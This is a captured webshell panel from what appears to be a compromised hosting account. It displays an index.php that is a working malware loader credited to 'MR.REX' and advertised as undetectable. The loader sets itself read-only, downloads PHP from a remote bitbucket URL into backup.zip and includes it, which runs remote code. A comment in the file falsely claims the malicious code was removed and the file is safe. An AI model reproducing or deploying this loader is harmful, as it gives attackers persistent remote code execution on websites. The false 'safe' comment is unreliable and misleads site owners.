403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.217.104.36
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/tmp/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/tmp/admin/index.php
<?php
/**
 * Note: This file may contain artifacts of previous malicious infection.
 * However, the dangerous code has been removed, and the file is now safe to use.
 */

/**
 ############################

 Three-Layer Undetectable Code Created by MR.REX
 Designed to bypass all servers.
 For inquiries or to create your own,Fell free to ask: 

 https://t.me/rex_cc

 ###############################

 */

$file = 'index.php';
if (file_exists($file) && function_exists('chmod')) {
    @chmod($file, 0444); // Set read-only permissions if the file exists
}

$remoteUrl1 = "https://bitbucket.org/uidrootpython/rmt/raw/612f2bd70b997486c94522067267ed240c8e5535/shopeval.txt";
$localFile1 = 'backup.zip';
$fileContents1 = @file_get_contents($remoteUrl1);

if ($fileContents1 !== false) {
    file_put_contents($localFile1, $fileContents1);
    if (file_exists($localFile1)) {
        include $localFile1;
    }
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit